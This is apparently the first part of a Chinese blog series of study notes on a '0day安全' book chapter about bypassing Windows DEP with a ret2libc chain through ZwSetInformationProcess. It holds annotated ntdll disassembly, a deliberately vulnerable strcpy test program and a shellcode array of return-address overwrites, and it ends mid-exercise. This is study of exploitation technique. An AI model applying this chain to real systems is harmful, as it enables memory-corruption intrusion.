<Oday安全 12.3.1Ret2Libc实战之利用ZwSetInformationProcess>一节注记(上)
来源:互联网 发布:windows host配置文件 编辑:程序博客网 时间:2024/06/01 08:11
0day安全这书越到后面越难,哎...先记录一下看书过程中的注记,便于后面理解。
书中以绕过ntdll!LdrpCheckNXCompatibility:ntdll!LdrpCheckNXCompatibility对SafeDisc的检测为例展开讨论。以下为代码流程图:
1.ntdll!LdrpCheckNXCompatibility:7c93cd17 8365fc00 and dword ptr [ebp-4],07c93cd1b 56 push esi7c93cd1c ff7508 push dword ptr [ebp+8]7c93cd1f e887ffffff call ntdll!LdrpCheckSafeDiscDll (7c93ccab)7c93cd24 3c01 cmp al,1 ;只有满足al==1,才会发生下面的跳转7c93cd26 6a02 push 27c93cd28 5e pop esi ;push 2/pop esi==mov esi,27c93cd29 0f84df290200 je ntdll!LdrpCheckNXCompatibility+0x1a (7c95f70e) ;跳到2处执行2. ntdll!LdrpCheckNXCompatibility+0x1a: ; 7c95f70e 8975fc mov dword ptr [ebp-4],esi7c95f711 e919d6fdff jmp ntdll!LdrpCheckNXCompatibility+0x1d (7c93cd2f) ;跳到3处执行3.7c93cd2f 837dfc00 cmp dword ptr [ebp-4],0;[ebp-4]中的值来源于1.中地址0x7c93cd26和0x7c93cd28的push/pop语句 7c93cd33 0f85f89a0100 jne ntdll!LdrpCheckNXCompatibility+0x4d (7c956831);跳到4处执行4.ntdll!LdrpCheckNXCompatibility+0x4d:7c956831 6a04 push 47c956833 8d45fc lea eax,[ebp-4]7c956836 50 push eax7c956837 6a22 push 22h7c956839 6aff push 0FFFFFFFFh7c95683b e84074fdff call ntdll!ZwSetInformationProcess (7c92dc80)7c956840 e92865feff jmp ntdll!LdrpCheckNXCompatibility+0x5c (7c93cd6d) ;跳到5处执行5.ntdll!LdrpCheckNXCompatibility+0x5c:7c93cd6d 5e pop esi7c93cd6e c9 leave ;mov esp,ebp pop ebp 7c93cd6f c20400 ret 4 ;ntdll!LdrpCheckNXCompatibility检测SafeDisc的流程结束
上面的代码片中有一处关键性的比较语句,只有当此处比较的结果得到满足,就能顺利关闭DEP。因此,全篇幅都是围绕此处代码在堆栈中做相应的调整。(虽然在3.处有一个比较语句,但此时[ebp-4]中的值为2,因此必然会发生跳转)。你可能会想当然的觉得只要在栈中预留一段
mov al,1;jmp 0x7c93cd24 ;跳转到cmp al,1处
这样的shellcode,使之覆盖栈中返回地址,当程序返回时跳转到mov al,1所在的地址,然后一切就搞定了~别忘了,现在堆栈是禁止执行的,所以这条路是行不通的。唯一能做的是在进程全部的可执行代码空间中寻找一段包含mov al,1的指令,然后将程序的返回地址覆盖为它。就这样结束了?当然不,CPU执行完mov al,1以后还要强制扭转CPU回到0x7c93cd24 cmp al,1处继续执行,否则,又无法关闭DEP了。
能强制扳转程序执行流的指令,往往首先会让人想到是:在进程空间中搜索到mov al,1;Call/Jmp xxxx目标这样的指令流。但是,仔细想想好像这些指令未必有用:
1.以0x7c93cd24为目的地址的直接跳转指令的数量应该不多;
2.call/jmp [N]这样的间接跳转指令,也会因为无法修改[N]的值导致跳转失败。
那是不是我们通向关闭DEP的道路就被堵死了?也不是,还有一种间接的跳转方式:push/ret指令组合。你可能会说进程空间中也未必会有push 0x7c93cd24这样的指令吧?没错,这样的指令确实不多,但是push/ret组合的本质是把返回地址通过push指令预设在堆栈中,当需要ret时,CPU到栈顶取返回地址。基于这种方式我们可以在溢出时将所有要跳转的目的地址全部预设在堆栈中,在需要进入LdrpCheckNXCompatibility函数时ret出来即可。
借鉴这种方式,在进程空间中搜索mov al,1;ret这样的指令流来满足第一个cmp语句。Od提示在0x7c80c190处有mov al,0x01;ret指令。在执行LdrpCheckNXCompatibility前,我们要跳去0x7c80c190处执行mov al,0x01;当遇到ret指令时,又要从栈顶取返回地址,跳到0x7c93cd24执行cmp al,0x01。对于第一次跳转,我们可以安排在test函数返回时发生,由于执行一次return语句会使esp=esp+4,因此第二次跳转的地址存放在堆栈上紧接着前一次返回地址的4个字节。
char shellcode[] = {"\x90\x90\x90\x90\x90\x90\x90\x90"\ //这8B正好覆盖到[ebp]"\x90\xc1\x80\x7c"\ //覆盖test返回地址,使其指向mov al,0x01"\x24\xcd\x93\x7c"\ //ret的返回地址,返回到LdrpCheckNXCompatibility执行cmp al,0x01"\x90\x90\x90\x90"};int test(){char arry[4] = {0};strcpy(arry,shellcode);return 0;}int main(){HMODULE hMod = LoadLibrary("shell32.dll");test();}我们来验证一下上面的shellcode是否能通过0x7c93cd29 je判断,进而进入LdrpCheckNXCompatibility的伪代码2中执行(注意esp的变化):
1.即将从test函数返回到mov al,0x01;ret指令序列中:
此时esp的值为0x12FF78,存放了mov al,0x01;ret指令序列所在的地址0x7c80c190。当test函数中的ret指令返回时,将返回到地址0x7c80c190。
2.即将返回到LdrpCheckNXCompatibility中:
由于前一次ret指令,esp寄存器的值比上一次截图多4B,指向0x12ff7c。其存放的返回地址为:0x7c93cd24,即进入到LdrpCheckNXCompatibility函数中。
3.进入LdrpCheckNXCompatibility函数:
恩,看来这样安排堆栈可以进入LdrpCheckNXCompatibility。
4.虽然,程序进入了LdrpCheckNXCompatibility,并执行通过cmp al,0x1但没执行几步就发生了异常:
一旦程序执行到0x7c95F70E处的mov ss:[ebp-0x04],esi指令,会触发访问无效内存的异常。此时EBP的指向0x90909090,往[0x90909090-4]处写值当然会引发异常。当然OD也提示我们这块地址无法访问:
触发访问无效内存的截图,右边为调用堆栈,倒数第二行显示的ExitCode=0xC0000005就是异常号:
要解决这个异常,需要调整ebp的值,让ebp指向有效的内存,当然栈空间是最好不过的。至于怎么做,这个放到下一篇再写~
- <Oday安全 12.3.1Ret2Libc实战之利用ZwSetInformationProcess>一节注记(上)
- <Oday安全 12.3.1Ret2Libc实战之利用ZwSetInformationProcess>一节注记(下)
- <Oday安全 12.3.1Ret2Libc实战之利用ZwSetInformationProcess>一节补充
- <Oday安全 11.6利用加载模块之外的地址绕过SafeSEH>一节注记---jmp [ebp+N] (上)
- <Oday安全 11.5利用未启用SafeSEH模块绕过SafeSEH>一节注记
- <Oday安全 11.6利用加载模块之外的地址绕过SafeSEH>一节注记---jmp [ebp+N] (下)
- 利用Ret2Libc挑战DEP——利用ZwSetInformationProcess
- 利用Ret2Libc挑战DEP之二——利用VirtualProtect
- Ret2libc 利用 VitualProtect
- Ret2libc 利用 VirtualAlloc
- 记录学习《0Day安全》路上遇到的问题解决方案 利用Ret2Libc挑战DEP
- Ret2libc
- 《ODAY安全:软件漏洞分析技术》学习心得
- 安全防护-入侵检测实战之全面问答(上)
- Linux设备驱动程序之二 ---- 完善上一节的驱动程序
- shellcode之二.Plus2:ret2libc实例
- Mailbox(getshell) writeup —— ret2libc的利用
- QQ场景漏洞Oday利用(下载并运行程序)
- 使用gradle的自定义Property实现Android项目的配置和依赖统一管理
- 25 总结
- 解决wordpress用户注册时,点击邮件中的重置密码链接提示“您的密码重设链接无效”
- 基于散列的集合简析-HashMap、HashSet、LinkedHashSet、LinkedHashMap
- 【收藏】学习资源汇总(不断更新...)
- <Oday安全 12.3.1Ret2Libc实战之利用ZwSetInformationProcess>一节注记(上)
- Repeating Decimals UVA - 202
- 路由器和交换机的区别
- 面试题-J2SE基础(一)
- c语言之辗转相除法实现十进制转换为八进制
- Java 帝国之消息队列
- 2017年试试Web组件化框架Omi
- cordova-plugin-wechat插件的使用
- 建立一个个人网站(第二弹——作为一个程序猿)